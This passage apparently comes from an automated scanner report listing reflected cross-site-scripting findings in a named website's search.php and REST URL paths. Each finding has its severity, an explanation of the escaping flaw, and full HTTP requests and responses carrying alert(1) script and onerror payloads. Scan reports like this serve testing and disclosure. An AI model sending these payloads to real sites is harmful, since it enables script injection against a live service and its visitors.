User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/search.php9e829<script>alert(1)</script>5cf41c406b0?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5241. http://www.resellerbase.com/web-service/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload f7d9e<a>ec8940300c0 was submitted in the Submit3 parameter and was echoed unmodified in the response. Note that the response is a 404 Not Found: the echo is in the error document's "The requested URL ... was not found on this server" line, which reproduces the raw request URI, so the reflecting component is the site's error handler rather than search.php itself.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt to identify a full proof-of-concept for injecting arbitrary JavaScript was not successful; examine the application's behaviour manually for input validation or other obstacles. Because the sink echoes the raw URI, also confirm delivery in the intended browser: many browsers percent-encode characters such as < and > in the request URL before sending it, and a handler that does not decode before echoing would then reflect the encoded form instead.

Request

GET /web-service/search.php?keyword=search...&Submit3=Searchf7d9e<a>ec8940300c0&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/search.php?keyword=search...&Submit3=Searchf7d9e<a>ec8940300c0&opt=2 was not found on this server.</p>
...[SNIP]...

2.5242. http://www.resellerbase.com/web-service/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/search.php

Issue detail

The value of the Submit3 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f7f7"><a>270de8f6e2c was submitted in the Submit3 parameter and was echoed unmodified in the response. The sink is the pagination link: its href is the full request URI with /more2.html appended, so the path segments, the query-string parameter names and the parameter values all reach the same double-quoted attribute, and the " in the payload closes it so that the rest is parsed as markup.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt to identify a full proof-of-concept for injecting arbitrary JavaScript was not successful; examine the application's behaviour manually for input validation or other obstacles, since the attribute breakout itself is already confirmed by the echoed "><a>.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /web-service/search.php?cat=3&keyword=search...&Submit3=Search3f7f7"><a>270de8f6e2c&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:51:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 58933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/web-service/search.php?cat=3&keyword=search...&Submit3=Search3f7f7"><a>270de8f6e2c&opt=1/more2.html" style="color: ">
...[SNIP]...

2.5243. http://www.resellerbase.com/web-service/search.php [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a18ae"><img%20src%3da%20onerror%3dalert(1)>6b220ec79b6879ecd was submitted in the cat parameter and was echoed as a18ae\"><img src=a onerror=alert(1)>6b220ec79b6879ecd in the application's response: the double quote was prefixed with a backslash (addslashes()-style escaping, which magic_quotes_gpc applied by default in PHP 5.2), but a backslash has no escaping meaning in HTML, so the " still terminates the href attribute and the <img> that follows is parsed as a tag. The sink here is the add.php?cat= link, a different location from the pagination link in the other search.php findings, so both need fixing.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses an event handler (onerror on an <img> whose src cannot load) rather than a <script> block; the space and = characters in the payload were URL-encoded in the request.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /web-service/search.php?cat=3a18ae"><img%20src%3da%20onerror%3dalert(1)>6b220ec79b6879ecd&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:50:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 59192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=3a18ae\"><img src=a onerror=alert(1)>6b220ec79b6879ecd">
...[SNIP]...

2.5244. http://www.resellerbase.com/web-service/search.php [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59532"><img%20src%3da%20onerror%3dalert(1)>4971c8571d1 was submitted in the cat parameter and was echoed as 59532\"><img src=a onerror=alert(1)>4971c8571d1 in the application's response: the double quote was prefixed with a backslash (addslashes()-style escaping), but a backslash has no escaping meaning in HTML, so the " still terminates the href attribute of the add.php?cat= link and the <img> that follows is parsed as a tag.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses an event handler (onerror on an <img> whose src cannot load) rather than a <script> block; the space and = characters in the payload were URL-encoded in the request.

Request

GET /web-service/search.php?cat=359532"><img%20src%3da%20onerror%3dalert(1)>4971c8571d1&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:49:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=359532\"><img src=a onerror=alert(1)>4971c8571d1">
...[SNIP]...

2.5245. http://www.resellerbase.com/web-service/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c4ba1<a>47d472334ba was submitted in the keyword parameter and was echoed unmodified in the response. Note that the response is a 404 Not Found: the echo is in the error document's "The requested URL ... was not found on this server" line, which reproduces the raw request URI, so the reflecting component is the site's error handler rather than search.php itself.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt to identify a full proof-of-concept for injecting arbitrary JavaScript was not successful; examine the application's behaviour manually for input validation or other obstacles. Because the sink echoes the raw URI, also confirm delivery in the intended browser: many browsers percent-encode characters such as < and > in the request URL before sending it, and a handler that does not decode before echoing would then reflect the encoded form instead.

Request

GET /web-service/search.php?keyword=search...c4ba1<a>47d472334ba&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/search.php?keyword=search...c4ba1<a>47d472334ba&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5246. http://www.resellerbase.com/web-service/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/search.php

Issue detail

The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 279e3"><a>09c3c85f61d was submitted in the keyword parameter and was echoed unmodified in the response. The sink is the pagination link: its href is the full request URI with /more2.html appended, so the path segments, the query-string parameter names and the parameter values all reach the same double-quoted attribute, and the " in the payload closes it so that the rest is parsed as markup.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt to identify a full proof-of-concept for injecting arbitrary JavaScript was not successful; examine the application's behaviour manually for input validation or other obstacles, since the attribute breakout itself is already confirmed by the echoed "><a>.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /web-service/search.php?cat=3&keyword=search...279e3"><a>09c3c85f61d&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:50:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 58933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/web-service/search.php?cat=3&keyword=search...279e3"><a>09c3c85f61d&Submit3=Search&opt=1/more2.html" style="color: ">
...[SNIP]...

2.5247. http://www.resellerbase.com/web-service/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83444"><script>alert(1)</script>f153566998d30c4d0 was submitted as the name of an arbitrarily supplied request parameter and was echoed unmodified in the response. The sink is the pagination link: its href is the full request URI with /more2.html appended, so parameter names reach the same double-quoted attribute as path segments and parameter values, and the " in the payload closes it so that the rest is parsed as markup.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /web-service/search.php?cat=3&keyword=search...&Submit3=Search&/83444"><script>alert(1)</script>f153566998d30c4d0opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 59049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/web-service/search.php?cat=3&keyword=search...&Submit3=Search&/83444"><script>alert(1)</script>f153566998d30c4d0opt=1&sort_by=title&sort_order=asc/more2.html" style="color: ">
...[SNIP]...

2.5248. http://www.resellerbase.com/web-service/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8839"><a>3d5c0bc141 was submitted as the name of an arbitrarily supplied request parameter and was echoed unmodified in the response. The sink is the pagination link: its href is the full request URI with /more2.html appended, so parameter names reach the same double-quoted attribute as path segments and parameter values, and the " in the payload closes it so that the rest is parsed as markup.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt to identify a full proof-of-concept for injecting arbitrary JavaScript was not successful; examine the application's behaviour manually for input validation or other obstacles, since the attribute breakout itself is already confirmed by the echoed "><a>.

Request

GET /web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%/e8839"><a>3d5c0bc141252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 59241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
h.php?cat=3&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%/e8839"><a>3d5c0bc141252f/more2.html" style="color: ">
...[SNIP]...

2.5249. http://www.resellerbase.com/web-service/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5ae4a<script>alert(1)</script>f8f0351079e was submitted as the name of an arbitrarily supplied request parameter and was echoed unmodified in the response. Note that the response is a 404 Not Found: the echo is in the error document's "The requested URL ... was not found on this server" line, which reproduces the raw request URI, so the reflecting component is the site's error handler rather than search.php itself.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the returned document. Because the sink echoes the raw URI, confirm delivery in the intended browser: many browsers percent-encode characters such as < and > in the request URL before sending it, and a handler that does not decode before echoing would then reflect the encoded form instead.

Request

GET /web-service/search.php?keyword=search...&Submit3=Search&opt=2&5ae4a<script>alert(1)</script>f8f0351079e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/search.php?keyword=search...&Submit3=Search&opt=2&5ae4a<script>alert(1)</script>f8f0351079e=1 was not found on this server.</p>
...[SNIP]...

2.5250. http://www.resellerbase.com/web-service/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/search.php

Issue detail

The value of the opt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc17e"><a>049a2d85bc5 was submitted in the opt parameter and was echoed unmodified in the response. The sink is the pagination link: its href is the full request URI with /more2.html appended, so the path segments, the query-string parameter names and the parameter values all reach the same double-quoted attribute, and the " in the payload closes it so that the rest is parsed as markup.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt to identify a full proof-of-concept for injecting arbitrary JavaScript was not successful; examine the application's behaviour manually for input validation or other obstacles, since the attribute breakout itself is already confirmed by the echoed "><a>.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1fc17e"><a>049a2d85bc5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:52:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 58933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1fc17e"><a>049a2d85bc5/more2.html" style="color: ">
...[SNIP]...

2.5251. http://www.resellerbase.com/web-service/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload a8ab1<a>0b574347db0 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/search.php?keyword=search...&Submit3=Search&opt=2a8ab1<a>0b574347db0 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/search.php?keyword=search...&Submit3=Search&opt=2a8ab1<a>0b574347db0 was not found on this server.</p>
...[SNIP]...

2.5252. http://www.resellerbase.com/web-service/search.php [select parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/search.php

Issue detail

The value of the select request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e197a"><a>042355fd855 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fe197a"><a>042355fd855 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:54:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 59241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
hp?cat=3&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fe197a"><a>042355fd855/more2.html" style="color: ">
...[SNIP]...

2.5253. http://www.resellerbase.com/web-service/search.php [select parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/search.php

Issue detail

The value of the select request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c5e5"><script>alert(1)</script>bdca378e947 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f1c5e5"><script>alert(1)</script>bdca378e947&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:53:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 59593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f1c5e5"><script>alert(1)</script>bdca378e947&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f&select=http%253a%252f%252fwww.resellerbase.com
...[SNIP]...

2.5254. http://www.resellerbase.com/web-service/software-scripts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d797b<script>alert(1)</script>4b6f32cfc6eb27974 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /web-serviced797b<script>alert(1)</script>4b6f32cfc6eb27974/software-scripts/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
